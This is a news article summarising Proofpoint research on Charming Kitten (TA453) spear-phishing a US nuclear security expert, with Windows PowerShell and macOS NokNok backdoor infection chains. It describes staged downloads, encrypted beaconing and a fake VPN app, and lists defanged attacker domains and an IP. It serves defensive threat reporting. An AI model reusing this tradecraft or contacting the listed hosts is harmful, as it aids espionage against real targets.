An Iranian state-sponsored threat group known for targeting diplomats, foreign policy experts, and government officials recently has employed a new infection chain and lure in an operation aimed at a nuclear security expert at a United States think tank.
The operation, identified by researchers at Proofpoint, is the work of a group known as Charming Kitten that is known to support the interests of the Islamic Revolutionary Guard Corps and has consistently targeted journalists, policy experts, and other key figures in sectors of interest to the Iranian government. Charming Kitten is also known as TA453 and APT42 and in the recent operation the group used a simple, benign email to begin a relationship with the target. The attackers then sent a follow-up email that contained a malicious macro that pointed to a Dropbox URL. That URL hosted a .rar file that in turn contained an LNK file.
“Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection. The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider,” a new analysis by Proofpoint says.
“Following the dropper using obfuscated PowerShell to call out to the cloud hosting provider, the malware uses the Gorjol function to download base64 encoded content from a .txt file. The downloaded content is decoded and invoked, becoming the function Borjol. Borjol communicates over AES encrypted HTTPS with the attacker-registered subdomain fuschia-rhinestone.cleverapps[.]io via the legitimate Clever Cloud service, which allows users to host JavaScript applications in the cloud. The returned data decrypts into another Borjol function. This new function uses previous variables and results in decrypting the PowerShell backdoor, dubbed GorjolEcho.”
After the backdoor was delivered to the victim, the TA453 attackers eventually realized that it wasn’t working as intended, because the victim’s machine was an Apple and the malware was designed for a Windows system. So the attackers went back to work and redesigned their infection chain to work on macOS and included a new backdoor that Proofpoint calls NokNok. The ZIP archive containing the NokNok backdoor was disguised as a VPN client.
“The bespoke VPN application masquerades as a VPN application GUI. Upon initialization, it executes an Apple script file, which uses curl to download a file from library- store[.]camdvr[.]org/DMPR/[alphanumeric string]. At the time of analysis, library- store.camdvr[.]org was resolving to 144.217.129[.]176, an OVH IP. This second stage is a bash script dubbed NokNok that establishes a backdoor on the system. It generates a system identifier by combining the operating system name, hostname, and a random number. That system identifier is then encrypted with the NokNok function and base64 encoded before being used as the payload of an HTTP POST to library-store.camdvr[.]org,” the analysis says.
The NokNok backdoor has four discrete modules, each with a separate function, including a mobile for persistence. There are overlaps between the functionality of NokNok and an older backdoor used by the same threat group, known as GhostEcho. TA453 has shown persistence and versatility in its operations over the years and is continuing to adapts its tools and tactics.
“TA453 continues to significantly adapt its infection chains to complicate detection efforts and conduct cyber espionage operations against its targets of interest. The use of Google Scripts, Dropbox, and CleverApps demonstrate that TA453 continues to subscribe to a multi-cloud approach in its efforts to likely minimize disruptions from threat hunters. TA453’s willingness to port malware to Mach-O also demonstrates how much effort the threat actor is willing to put into pursuing its targets,” the Proofpoint researchers said.